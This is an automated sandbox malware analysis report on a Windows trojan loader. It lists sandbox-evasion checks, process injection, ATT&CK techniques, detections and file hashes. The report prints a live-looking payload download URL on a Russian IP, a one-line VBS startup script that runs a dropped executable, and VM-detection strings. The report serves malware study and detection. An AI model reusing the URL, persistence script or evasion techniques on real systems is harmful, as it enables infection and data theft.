                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: seniorcommunicate.exe PID: 6752, type: MEMORYSTR
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 1940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 1980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeWindow / User API: threadDelayed 6898Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeWindow / User API: threadDelayed 2663Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4784Thread sleep count: 6898 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4784Thread sleep count: 2663 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99531s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98944s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 6748 Thread sleep count: 31 > 30
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 6748 Thread sleep time: -30969s >= -30000s
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF71D1D204C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF71D1D64E4
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Thread delayed: delay time: 100000
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                  Source: seniorcommunicate.exe, 00000001.00000002.2522998831.0000000001515000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF71D1D1D28
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF71D1D8494
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D8790 SetUnhandledExceptionFilter,0_2_00007FF71D1D8790
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Memory allocated: page read and write | page guard
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF71D1D11CC
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF71D1D8964
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe Code function: 0_2_00007FF71D1D2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF71D1D2C54
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts2
                  Native API
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Data Obfuscation
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Scheduled Task/Job
                  11
                  Process Injection
                  1
                  Obfuscated Files or Information
                  Security Account Manager16
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron21
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  2
                  Software Packing
                  NTDS211
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                  Registry Run Keys / Startup Folder
                  1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging1
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials41
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Rundll32
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Source | Detection | Scanner | Label | Link
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX |
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe | 100% | Avira | HEUR/AGEN.1323683 |
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe | 100% | Avira | HEUR/AGEN.1323683 |
                  C:\Users\user\AppData\Local\cvchost.exe | 100% | Avira | HEUR/AGEN.1323683 |
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\cvchost.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                  C:\Users\user\AppData\Local\cvchost.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |

                  No Antivirus matches
                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
                  http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                  https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
                  https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |
                  http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  http://46.8.237.66/spool01/Rhxkjsv.pdf | true | | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                      unknown
                      https://github.com/mgravell/protobuf-netiseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                        unknown
                        https://stackoverflow.com/q/14436606/23354seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        unknown
                        https://github.com/mgravell/protobuf-netJseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                          unknown
                          http://46.8.237.66/spool01/Rhxkjsv.pdfVSecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000000.2106899462.0000000000FB2000.00000002.00000001.01000000.00000004.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            unknown
                            http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameseniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
                            https://stackoverflow.com/q/11564914/23354;seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
                            https://stackoverflow.com/q/2152978/23354seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
                            http://ocsp.thawte.com0SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            • URL Reputation: safe
                            unknown
                            http://46.8.237.66seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                              46.8.237.66 | unknown | Russian Federation | | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
                              Joe Sandbox version: 41.0.0 Charoite
                              Analysis ID: 1545677
                              Start date and time: 2024-10-30 20:18:08 +01:00
                              Joe Sandbox product: CloudBasic
                              Overall analysis duration: 0h 6m 17s
                              Hypervisor based Inspection enabled: false
                              Report type: full
                              Cookbook file name: default.jbs
                              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed: 10
                              Number of new started drivers analysed: 0
                              Number of existing processes analysed: 0
                              Number of existing drivers analysed: 0
                              Number of injected processes analysed: 0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode: default
                              Analysis stop reason: Timeout
                              Sample name: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              Detection: MAL
                              Classification: mal100.expl.evad.winEXE@7/3@0/1
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 178
                              • Number of non-executed functions: 36
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target InstallUtil.exe, PID 3796 because it is empty
                              • Execution Graph export aborted for target seniorcommunicate.exe, PID 6752 because it is empty
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              Time | Type | Description
                              15:19:00 | API Interceptor | 49x Sleep call for process: seniorcommunicate.exe modified
                              20:19:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.237.66 | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66/spool02/Odgcgoez.wav
 | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66/spool02/Odgcgoez.wav
 | Zo1o3PhmtM.exe | malicious | Unknown | 46.8.237.66/spool03/Cuyfu.wav
 | 67JPbskewt.exe | malicious | Unknown | 46.8.237.66/spool01/Jmkjslnf.dat
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
 | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
 | Zo1o3PhmtM.exe | malicious | Unknown | 46.8.237.66
 | 67JPbskewt.exe | malicious | Unknown | 46.8.237.66
 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.236.61
 | nabspc.elf | malicious | Unknown | 109.248.104.45
 | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 46.8.232.106
 | la.bot.mipsel.elf | malicious | Unknown | 185.16.116.131
 | https://t.ly/ZPR23.10 | malicious | Unknown | 46.8.232.106
 | la.bot.powerpc.elf | malicious | Unknown | 46.8.228.109
                              No context
                              No context
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):57568
                              Entropy (8bit):6.820716747842333
                              Encrypted:false
                              SSDEEP:1536:XuDs9KP5GWe1iEEJKIO9vkkADDDDDm4g3y:Xu9RLqMJKICj4z
                              MD5:D9021E407CD5133BA842A9F6F21B606B
                              SHA1:67A90E9EF2E33248EE2F2AA6D3A53346726FA87C
                              SHA-256:B3D34711A7AA3D844F0F7184F1595C285A01F23BDB59AA159826519CF491954A
                              SHA-512:85BEC77977E14A9CB7F2D695F9ED36C70A67C40680B92410E277F82EAF174D2B80603FEFBCB3CE6DC7AA80DD02FB6F297633C9405957D3FCBC783660079B19DE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 29%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..g.................B...........`... ........@.. .......................@............`..................................`..K............................ ....................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc....... ......................@..B.................`......H........=...#...........................................................*...(....*...(....*.(....&*.0..s....... ........8........E....+...........8&...s...... ....~D...{....:....& ....8......*.(...... ....~D...{B...:....& ....8........E........P...8......(....u......(....r...p .......o....(...... ....~D...{8...:....& ....8.....p.....:H... ....~D...{8...:....& ....8........E....:...........85...80... ....8......(.... ....~D...{*...9....& ....8..... ....~D...{....:....& ....8.
                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:modified
                              Size (bytes):57568
                              Entropy (8bit):6.820716747842333
                              Encrypted:false
                              SSDEEP:1536:XuDs9KP5GWe1iEEJKIO9vkkADDDDDm4g3y:Xu9RLqMJKICj4z
                              MD5:D9021E407CD5133BA842A9F6F21B606B
                              SHA1:67A90E9EF2E33248EE2F2AA6D3A53346726FA87C
                              SHA-256:B3D34711A7AA3D844F0F7184F1595C285A01F23BDB59AA159826519CF491954A
                              SHA-512:85BEC77977E14A9CB7F2D695F9ED36C70A67C40680B92410E277F82EAF174D2B80603FEFBCB3CE6DC7AA80DD02FB6F297633C9405957D3FCBC783660079B19DE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 29%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..g.................B...........`... ........@.. .......................@............`..................................`..K............................ ....................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc....... ......................@..B.................`......H........=...#...........................................................*...(....*...(....*.(....&*.0..s....... ........8........E....+...........8&...s...... ....~D...{....:....& ....8......*.(...... ....~D...{B...:....& ....8........E........P...8......(....u......(....r...p .......o....(...... ....~D...{8...:....& ....8.....p.....:H... ....~D...{8...:....& ....8........E....:...........85...80... ....8......(.... ....~D...{*...9....& ....8..... ....~D...{....:....& ....8.
                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):83
                              Entropy (8bit):4.6663329267324505
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHHoN+E2J5GTaDLACHn:FER/lFHIN723G4J
                              MD5:71E31D9548FE2D97AAFDC5134625927C
                              SHA1:45C47134175F743B5A1222D082E0D1A3D636B90D
                              SHA-256:102E8ED665A14D57DCB62D97B4865C71F7F14D025DCF3ACC012F7719401C38AA
                              SHA-512:BF84E5C9F3A1478C1C3AAE37A45F67A2EEBD7672736BBEBF84ED5C4417A5FE950C5CE6D41264798F3116CA45140BE93E6DD12EB66A86107A5C26ED6DA895C67E
                              Malicious:true
                              Reputation:low
                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\cvchost.exe"""
                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                              Entropy (8bit):7.100413056749933
                              TrID:
                              • Win64 Executable GUI (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              File size:194'048 bytes
                              MD5:485927fe0c19012f31f1ef565254b374
                              SHA1:af67270688bdaca5c92425ce644f248703f80e41
                              SHA256:11d025152433189799f82de6b428f5ceb8ddb47573a38d51c267d48b891d498e
                              SHA512:725cee7409122a7da8e29f4e50f19942a18e472f8561f2d2b95ae72338f84cdf8b642f7cc9a53a5d9eb8fc68f38450f1d93ce8974b00878304d56fb5638c6581
                              SSDEEP:3072:OahKyd2n3195GWp1icKAArDZz4N9GhbkrNEk1Apa6T2I5zaeT:OahOZp0yN90QEppXSKaG
                              TLSH:4414BF5A67E420B6E4B6977098F202835A32BCB15B7986FF12C4D57E1E336C0A532F17
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                              Icon Hash:3b6120282c4c5a1f
                              Entrypoint:0x140008200
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x140000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:10
                              OS Version Minor:0
                              File Version Major:10
                              File Version Minor:0
                              Subsystem Version Major:10
                              Subsystem Version Minor:0
                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                              Instruction
                              dec eax
                              sub esp, 28h
                              call 00007FC938BA9AD0h
                              dec eax
                              add esp, 28h
                              jmp 00007FC938BA937Bh
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              dec eax
                              mov dword ptr [esp+08h], ebx
                              dec eax
                              mov dword ptr [esp+10h], edi
                              inc ecx
                              push esi
                              dec eax
                              sub esp, 000000B0h
                              and dword ptr [esp+20h], 00000000h
                              dec eax
                              lea ecx, dword ptr [esp+40h]
                              call dword ptr [000011CDh]
                              nop
                              dec eax
                              mov eax, dword ptr [00000030h]
                              dec eax
                              mov ebx, dword ptr [eax+08h]
                              xor edi, edi
                              xor eax, eax
